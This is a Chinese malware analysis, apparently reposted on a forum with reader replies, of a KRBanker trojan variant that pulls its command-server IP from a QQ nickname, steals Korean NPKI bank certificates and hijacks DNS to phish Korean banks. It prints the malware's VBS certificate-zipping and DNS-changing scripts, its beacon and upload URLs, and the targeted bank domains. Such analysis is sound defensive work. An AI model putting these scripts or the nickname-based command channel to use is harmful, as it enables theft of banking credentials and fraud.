利用QQ昵称反弹连接木马技术分析
安全研究人员最近发现KRBanker家族新变种,其利用腾讯QQ空间的接口获取反弹连接IP,劫持本机DNS,拦截韩国银行网站钓鱼。本文将对其进行详细的分析。0×01 概况今天要介绍的是一款利用QQ空间反弹连接的恶意软件,这款软件主要通过溢出套件挂马传播,当通过挂马页面下载到受害机器上,利用QQ空间的信息获取反弹连接的服务器IP信息,通过下载另外的组件拦截韩国相关银行网站.窃取网银相关信息回传服务器。这个恶意软件属于KRBanker家族的新变种( Korea+Banker=KRBanker)攻击流程,如下图所示首先通过kaixin、 gondad等溢出套件挂马,当访问挂马站点时溢出成功会下载一个EXE,它会安装自启动在目标系统中。查询QQ号的昵称信息,获取命令与控制(command and control)服务器的IP,收集银行证书上传.并篡改本地DNS服务器IP进行域名劫持。http://s1.51cto.com/wyfs02/M02/5C/38/wKiom1Ucq23DrzsQAACX2GCYvjc594.jpg0×02 技术细节1) 获取控制服务器IP黑客通过修改QQ昵称信息为木马的控制端IP, 木马通过查询QQ昵称信息的接口获取到昵称信息(nickname),就获得了控制IP.进而反向连接控制服务器,接收恶意指令。http://s4.51cto.com/wyfs02/M00/5C/33/wKioL1UcrLqhPlCZAAHWNCWWP-0687.jpg通过QQ空间的API获取IP,nikename被设置为控制端IP例如:其中 uin=为QQ号码请求http://r.qzone.qq.com/cgi-bin/user/cgi_personal_card?uin=1474897680?=6330返回信息_Callback({"uin":1474897680,"qzone":0,"intimacyScore":0,"nickname":"61.228.32.148","realname":"","smartname":"","friendship":0,"isFriend":0,"bitmap":"08009c8002000101","avatarUrl":http://qlogo1.store.qq.com/qzone/1474897680/1474897680/100});如果用QQ查询可以直观的看到昵称被设置成IP格式:http://s3.51cto.com/wyfs02/M01/5C/38/wKiom1Ucq4jDeGXiAAItiljcIM8057.jpg黑客这么做的目的是利用QQ昵称保存IP信息,达到和动态域名相同的效果,一旦IP被封可以立即修改IP.同时也避免了使用动态域名被拦截的情况,比如国内的3322,f3322 等已经引起安全警惕。而采用qq空间网站域名,可以绕过针对域名拦截的IDS设备,顺利查询到控制IP。获取C&C的IP后,获取本地MAC信息提交,如格式http://ip/Count.asp?ver=001&mac=xx-xx-xx-xx-xx-xxhttp://s8.51cto.com/wyfs02/M02/5C/33/wKioL1UcrNPicYEHAAFr2ILyzsU511.jpg2) 窃取证书上传目前的网银保护机制主要包括密码,数字证书,手机短信,由于韩国的网银主要使用IE浏览器,并使用Activex作开发.其数字证书主要保存在磁盘上,位置包括%ProgramFiles%\NPKI和其他的U盘目录如下:%DriveLetter%\NPKI%ProgramFiles%\NPKI%SystemDrive%\Documentsand Settings\All Users\Application Data\LocalLow\NP该KRBanker变种会从这些NPKI目录中收集数字证书文件。遍历磁盘查询包含NPKI名称的文件夹http://s6.51cto.com/wyfs02/M00/5C/39/wKiom1UcrGjRJM26AACccJPeCNE758.jpg使用使用VBS脚本窃取主机内的证书,打包成ZIP文件VBS脚本如下:Sub Zip(ByVal mySourceDir, ByVal myZipFile)Set fso = CreateObject("Scripting.FileSystemObject")If fso.GetExtensionName(myZipFile) <>"zip"ThenExitSubElseIf fso.FolderExists(mySourceDir) ThenFType = "Folder"ElseIf fso.FileExists(mySourceDir) ThenFType = "File"FileName = fso.GetFileName(mySourceDir)FolderPath = Left(mySourceDir, Len(mySourceDir)- Len(FileName))ElseExitSubEndIfSet f = fso.CreateTextFile(myZipFile,True)f.Write "PK" & Chr(5) & Chr(6) & String(18, Chr(0))f.CloseSet objShell = CreateObject("Shell.Application")SelectCase FtypeCase"Folder"Set objSource = objShell.NameSpace(mySourceDir)Set objFolderItem = objSource.Items()Case"File"Set objSource = objShell.NameSpace(FolderPath)Set objFolderItem = objSource.ParseName(FileName)EndSelectSet objTarget = objShell.NameSpace(myZipFile)intOptions = 256objTarget.CopyHere objFolderItem, intOptionsDoWScript.Sleep 1000LoopUntil objTarget.Items.Count > 0EndSub在临时目录生成zip文件http://s5.51cto.com/wyfs02/M02/5C/39/wKiom1UcrLbBoXY7AACNoZ0u0qg888.jpg开始回传收集的zip文件,回传URL地址为http://61.228.32.*/upload.phphttp://s1.51cto.com/wyfs02/M00/5C/39/wKiom1UcrMXwo6q6AADPqpdehcg700.jpg协议类型: POST,name为upload_file1,分割特征为—–7da3e1bd0314http://s4.51cto.com/wyfs02/M02/5C/34/wKioL1UcrhPBk6zuAAH6Zf921DY582.jpg3)拦截银行网站和搜索门户黑客还会通过拦截银行网站进行钓鱼,从而获取银行帐户密码等详细信息从而获得权限来访问受害者的账户.DNS拦截过程主要分为两个步骤:步骤1.修改DNS服务器设置为本机修改的VBS脚本代码如下:strGatewayMetric= Array(1)arrDNSServers= Array("127.0.0.1","8.8.8.8")strComputer= "."SetobjWMIService = GetObject("winmgmts:" _&"{impersonationLevel=impersonate}!\\" & strComputer &"\root\cimv2")SetcolNetAdapters = objWMIService.ExecQuery _("Select* from Win32_NetworkAdapterConfiguration where IPEnabled=TRUE")ForEach objNetAdapter in colNetAdapterserrEnable= objNetAdapter.EnableStatic(strIPAddress, strSubnetMask)errGateways= objNetAdapter.SetGateways(strGateway, strGatewaymetric)errDNS= objNetAdapter.SetDNSServerSearchOrder(arrDNSServers)IferrEnable = 0 ThenEndIfNext设置主DNS服务器的地址为127.0.0.1http://s8.51cto.com/wyfs02/M01/5C/34/wKioL1UcrouDTL6GAAEiBfPuLvk798.jpg步骤2.监听本机53端口过滤拦截域名请求通过端口查看工具可以看到恶意进程监听了本机0.0.0.0:53端口.
http://s6.51cto.com/wyfs02/M00/5C/34/wKioL1UcrnnTh3P7AAKEpK6M2AA990.jpg
由于Krbanker木马将首选DNS服务器设置为127.0.0.1,这样所有的DNS请求将会转发给本机的53端口. Krbanker木马接收到域名请求会判断是否需要劫持域名,如果不需要劫持就构造一个域名查询的数据包直接发送到8.8.8.8获取真实IP反馈.如果需要劫持就篡改到钓鱼站点. 拦截的银行包括韩国农协银行(NH Bank)、新韩银行,友利银行、韩亚银行、国民银行、韩国外换银行、韩国中小企业银行、邮政银行。同时拦截韩国的综合性入口网站.包括Naver、Nate、Daum.拦截的网站域名如下:www.nonghyup.comnonghyup.combanking.nonghyup.comwww.nonghyup.co.krnonghyup.co.krbanking.nonghyup.co.krwww.shinhan.comshinhan.comwww.shinhanbank.comshinhanbank.comwww.shinhanbank.co.krshinhanbank.co.krbanking.shinhanbank.combanking.shinhan.combanking.shinhanbank.co.krwww.hanabank.comhanabank.comwww.hanabank.co.krhanabank.co.krwww.wooribank.comwooribank.comwww.wooribank.krwooribank.krwww.wooribank.co.krwooribank.co.krwww.kbstar.comkbstar.comwww.kbstar.co.krkbstar.co.krwww.keb.co.krkeb.co.krebank.keb.co.kronline.keb.co.krwww.ibk.co.kribk.co.krwww.ibk.kribk.krmybank.ibk.co.krbanking.ibk.co.krwww.kfcc.co.krkfcc.co.krwww.kfcc.comkfcc.comwww.epostbank.co.krepostbank.co.krwww.epost.krepost.krwww.epostbank.krepostbank.krwww.naver.comnaver.comwww.naver.netnaver.netwww.naver.co.krnaver.co.krwww.nate.comnate.comwww.nate.netnate.netwww.nate.krnate.krwww.nate.co.krnate.co.krwww.daum.netdaum.netwww.daum.co.krdaum.co.kr这些域名是加密保存在EXE当中,运行后解密用于拦截匹配.http://s6.51cto.com/wyfs02/M00/5C/34/wKioL1Ucrp-D37FSAAIZN0PNWjs699.jpg0×03 总结利用QQ这种方式传递信息和国外恶意代码利用社交网站做信息中转类似,都是为了躲避IDS的检测,同时具有良好的稳定性.在钓鱼拦截方面之前的krbanker家族采用的是hosts文件修改方法,而新的变种采用了本机53端口监听方式进行劫持更加隐蔽。0×04 参考链接http://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2014-120510-3326-99http://malware-traffic-analysis.net/2014/12/13/index.htmlhttp://www.malware-traffic-analysis.net/2015/01/31/index.htmlhttps://www.hybrid-analysis.com/sample/e9c6b5ba7083295562dd4ce0d1767e48a30267111bf486d6bb84421fa28542dd/http://intumyself.tistory.com/m/post/371http://www.wooyun.org/bugs/wooyun-2010-09633http://www.secdoctor.com/html/sec/23715.htmlhttp://www.freebuf.com/news/54637.html
本帖最后由 smile1110 于 2015-7-25 19:00 编辑
无非就是随着控制端QQ昵称改变来随时改变反弹木马的主动连接的请求发包的ip,变相成为了动态ip上线,但是QQ号码是固定的,这就是实现了的类似咱们以前普遍在用的动态域名上线方式,而这个最大特色在于TX的地址是普遍受到保护的,而且这个行为也是普遍被杀软忽视的,本文全程看着非常先进,其实不然,该木马最大的缺陷在于是反弹式木马首先这个发包可以被目前99%非静默状态防火墙提示,甚至可以直接拦截,那该木马也就是失去了实际作用,这种技术还不算高,俺早年看到一款土耳其概念式木马,人家用网站上面的导航栏挂件来实现反弹连接,更牛b在于什么flash漏洞啊,解析漏洞啊,各种xss跨站啊啊,各种形式获取你的cookies啊,你只要访问那个网页层出不穷的挂马方式,这个木马我06年看到的,现在时隔9年,仍然比这个利用QQ昵称获取控制端ip上线的先进的多 话说某远空早就用这种方法进行了。 真心没看懂 好高深啊
虽然不懂还是顶下 {:301_977:}我也看不懂啊 同上.... {:301_998:}没看懂 支持一下 反正看不懂就水一贴吧 好深奥,没看懂。 QQ昵称远程木马啊好高端啊